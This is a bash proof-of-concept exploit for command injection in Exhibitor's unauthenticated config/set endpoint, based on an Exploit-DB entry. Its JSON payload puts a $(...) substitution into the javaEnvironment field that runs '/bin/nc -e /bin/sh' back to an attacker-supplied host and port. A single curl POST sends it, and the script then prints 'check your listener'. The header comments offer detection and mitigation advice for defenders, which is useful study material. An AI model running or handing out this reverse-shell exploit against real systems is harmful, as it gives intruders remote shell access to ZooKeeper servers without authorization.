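#!/bin/bash
#
# Proof-of-concept request for the Exhibitor config-editor command injection
# documented at https://www.exploit-db.com/exploits/48654.
#
# Usage: script <target_host> <target_port> <attacker_host> <attacker_port>
#
# What the request shows (for reviewers and detection engineers):
#   * A single unauthenticated POST to /exhibitor/v1/config/set replaces the
#     whole Exhibitor configuration document. No credentials or session
#     token are sent, so the endpoint is only as protected as the network
#     path to it.
#   * The "javaEnvironment" field carries a $(...) command substitution.
#     NOTE(review): per the referenced entry this value ends up in a shell
#     script that Exhibitor evaluates when it (re)starts ZooKeeper; that
#     server-side step is not visible in this file.
#   * Detection: log and alert on POSTs to the config/set path whose
#     javaEnvironment value contains "$(" or backticks, on nc/sh processes
#     spawned under the Exhibitor/ZooKeeper service account, and on new
#     outbound TCP connections from ZooKeeper hosts.
#   * Mitigation: keep the Exhibitor UI off untrusted networks and put
#     authentication in front of it; treat javaEnvironment as code, not data.

# Banner text is kept exactly as it appears in this copy; its original line
# layout was lost when the file was collapsed.
echo " ------------------------------------------------------------------------------ _____ _ _ _ _ _ __ __ _ _ _ ___ | ____|_ _| |__ (_) |__ (_) |_ ___ _ __ \ \ / /__| |__ | | | |_ _| | _| \ \/ / '_ \| | '_ \| | __/ _ \| '__| \ \ /\ / / _ \ '_ \ | | | || | | |___ > <| | | | | |_) | | || (_) | | \ V V / __/ |_) | | |_| || | |_____/_/\_\_| |_|_|_.__/|_|\__\___/|_| \_/\_/ \___|_.__/ \___/|___| _ _____ _ ____ ____ _____ / ||___ / | | _ \ / ___| ____| | | / /| | _____ | |_) | | | _| | |_ / /_| | |_____| | _ <| |___| |___ |_(_)_/(_)_| |_| \_\\____|_____| ------------------------------------------------------------------------------ "
echo -e "\e[1;33mOriginal exploit : https://www.exploit-db.com/exploits/48654\n\e[0m"
echo -e "\e[1;31m----------------This bash script is edited by @thehunt1s0n--------------------\n\e[0m"

# Exactly four positional arguments are required. The usage text names them
# (the collapsed copy printed an empty usage line) and goes to stderr.
if [ "$#" -ne 4 ]; then
  printf 'Usage: %s <target_host> <target_port> <attacker_host> <attacker_port>\n' "$0" >&2
  exit 1
fi

HOST="$1"
PORT="$2"
ATTACKER_HOST="$3"
ATTACKER_PORT="$4"
URL="http://$HOST:$PORT/exhibitor/v1/config/set"

# Request body. It mirrors the document the UI's Config tab submits on
# commit (the original author captured it with an intercepting proxy), so
# values such as serversSpec belong to the host it was captured from and
# may not match another deployment.
# The two arguments are spliced in between single-quoted segments; they are
# double-quoted here so the body always reaches curl as one word. They are
# not JSON-escaped.
PAYLOAD='{"zookeeperInstallDirectory":"/opt/zookeeper","zookeeperDataDirectory":"/zookeeper/data","zookeeperLogDirectory":"","logIndexDirectory":"","autoManageInstancesSettlingPeriodMs":"10000","autoManageInstancesFixedEnsembleSize":"0","autoManageInstancesApplyAllAtOnce":"1","observerThreshold":"3","serversSpec":"1:pelican","javaEnvironment":"$(/bin/nc -e /bin/sh '"$ATTACKER_HOST"' '"$ATTACKER_PORT"' &)","log4jProperties":"","clientPort":"2181","connectPort":"2888","electionPort":"3888","checkMs":"2000","cleanupPeriodMs":"200000","cleanupMaxFiles":"10","backupPeriodMs":"60000","backupMaxStoreMs":"86400000","autoManageInstances":"1","zooCfgExtra":{"syncLimit":"5","tickTime":"2000","initLimit":"10"},"backupExtra":{},"serverId":1}'

# Send the POST. The response body is discarded, as in the original (it was
# captured into a variable that was never read).
# curl's exit status only says the HTTP exchange completed: with -s and no
# --fail, an HTTP error response still yields status 0, so the success
# message below does not confirm the configuration was accepted.
if curl -s -X POST -d "$PAYLOAD" "$URL" > /dev/null; then
  echo -e "\e[1;32mCurl command executed successfully, check your listener.\e[0m"
else
  echo -e "\e[1;31mSomething is wrong\e[0m"
  exit 1
fi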